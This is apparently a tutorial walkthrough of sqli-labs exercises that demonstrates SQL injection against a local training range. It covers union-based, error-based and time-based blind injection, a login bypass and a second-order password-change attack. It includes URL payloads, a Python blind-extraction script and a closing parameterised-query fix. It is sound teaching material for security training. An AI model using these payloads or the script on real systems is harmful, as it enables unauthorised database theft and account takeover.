Demonstrated on the sqli-labs range:
Less-1:
The injection point is:
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
The id is taken from GET, and the single quote can be escaped from to achieve SQL injection.
With normal input, the content queried from the database is printed:
http://127.0.0.1:8080/sqli-labs/Less-1/?id=1
A UNION query can be used, or error-based injection with updatexml(1,concat(),1) (which only shows 32 characters) or extractvalue(). A UNION query requires knowing how many columns there are; order by can be used to find the number of columns, and a number can be used in place of a column name.
The fourth attempt errors out, which means there are three columns:
http://127.0.0.1:8080/sqli-labs/Less-1/?id=1%27%20order%20by%204%23

Then use a UNION query:
http://127.0.0.1:8080/sqli-labs/Less-1/?id=-1%27%20union%20select%201,user(),database()%23

Less-5:
Error-based injection: updatexml(1,concat(),1) (which only shows 32 characters) and extractvalue()
Supplement: use substr((),1,32) to take the first 32 characters at a time, so that long data is not lost to truncation
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
# The injection point is unchanged, but because the output has changed, the injection method changes
# Correct output is this:
echo 'You are in...........';
# Error output is this:
print_r(mysqli_error($con1));
http://127.0.0.1:8080/sqli-labs/Less-5/?id=1%27%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)%23

Less-9:
Time-based blind injection:
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
# The injection point is still the same, but the true and false branches return nothing different
if($row)
	{
	echo '<font size="5" color="#FFFF00">';
	echo 'You are in...........';
	echo "<br>";
	echo "</font>";
	}
	else
	{
	echo '<font size="5" color="#FFFF00">';
	echo 'You are in...........';
	//print_r(mysqli_error($con1));
	//echo "You have an error in your SQL syntax";
	echo "</br></font>";
	echo '<font color= "#0000ff" font size= 3>';
	}
Use Python to brute-force it with a binary search:
import time
import requests

url = 'http://127.0.0.1:8080/sqli-labs/Less-9/index.php'

def inject_database(url):
    name = ''
    for i in range(1, 20):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            # The injection point converts the i-th character to its ASCII code and compares
            # it with mid; if the character is larger, the server sleeps for one second.
            payload = "1' and if(ascii(substr(database(), %d, 1)) > %d, sleep(1), 0)-- " % (i, mid)
            res = {"id": payload}
            start_time = time.time()
            r = requests.get(url, params=res)
            end_time = time.time()
            if end_time - start_time >= 1:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        # Past the end of the name substr() returns '', whose ascii() is 0, so the search
        # settles on the lower bound 32: the name is complete.
        if mid == 32:
            break
        name = name + chr(mid)
        print(name)

inject_database(url)
If you get an error like the following:
Traceback (most recent call last):
  File "。。。。", line 1, in <module>
    import requests
ModuleNotFoundError: No module named 'requests'
 
press Win+R, open cmd and run:
pip install requests

Less-11:
A username and password are submitted via POST.
Injection point:
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
# The returned content is:
		echo 'Your Login name:'. $row['username'];
		echo "<br>";
		echo 'Your Password:' .$row['password'];
		echo "<br>";
		print_r(mysqli_error($con1));
So the same approach as above can still be used:
enter in the username field:
a'union select 1,user()#

Less-24:
Second-order injection: two steps, storing into the database and reading back out
On the way in the input is filtered, so injection cannot succeed there:
   $username = mysqli_real_escape_string($con1, $_POST["login_user"]);
   $password = mysqli_real_escape_string($con1, $_POST["login_password"]);
   $sql = "SELECT * FROM users WHERE username='$username' and password='$password'";
But on the way out the stored content is not filtered, so SQL injection can be attempted when it is read back:
$username= $_SESSION["username"];
$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";
When registering an account, enter Dumb'# as the username; then, following the prompts, the value typed into "new password" becomes the new password of the Dumb account.
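Why escaping on the way in does not help, and what does, as an added example that is not part of the original post or of sqli-labs: a constructed in-memory SQLite copy of the users table (SQLite comments use -- where MySQL uses #, so the registered name is Dumb'-- here) run through the Less-24 UPDATE built by string formatting, then through the same UPDATE with bound parameters.

```python
import sqlite3

def make_db():
    # Constructed table: the victim "Dumb" and an attacker who registered the
    # name Dumb'-- (stored literally, because escaping only protected the INSERT).
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)",
                    [("Dumb", "Dumb"), ("Dumb'--", "attacker")])
    return con

def change_password_vulnerable(con, session_username, curr_pass, new_pass):
    # Mirrors Less-24: the username comes from the session and is interpolated
    # into the UPDATE unescaped, so the quote ends the string and -- drops the rest.
    sql = ("UPDATE users SET password='%s' WHERE username='%s' AND password='%s'"
           % (new_pass, session_username, curr_pass))
    con.execute(sql)
    con.commit()

def change_password_fixed(con, session_username, curr_pass, new_pass):
    # Bound parameters: the stored username is data, never SQL, whatever it contains.
    con.execute("UPDATE users SET password=? WHERE username=? AND password=?",
                (new_pass, session_username, curr_pass))
    con.commit()

def password_of(con, username):
    row = con.execute("SELECT password FROM users WHERE username=?", (username,)).fetchone()
    return row[0]

def demo(fixed):
    # The attacker changes "their own" password; returns (Dumb's password, attacker's password).
    con = make_db()
    change = change_password_fixed if fixed else change_password_vulnerable
    change(con, "Dumb'--", "attacker", "pwned")
    return password_of(con, "Dumb"), password_of(con, "Dumb'--")

if __name__ == "__main__":
    print("string-built UPDATE:", demo(fixed=False))   # Dumb's password is overwritten
    print("parameterised UPDATE:", demo(fixed=True))   # only the attacker's own row changes
```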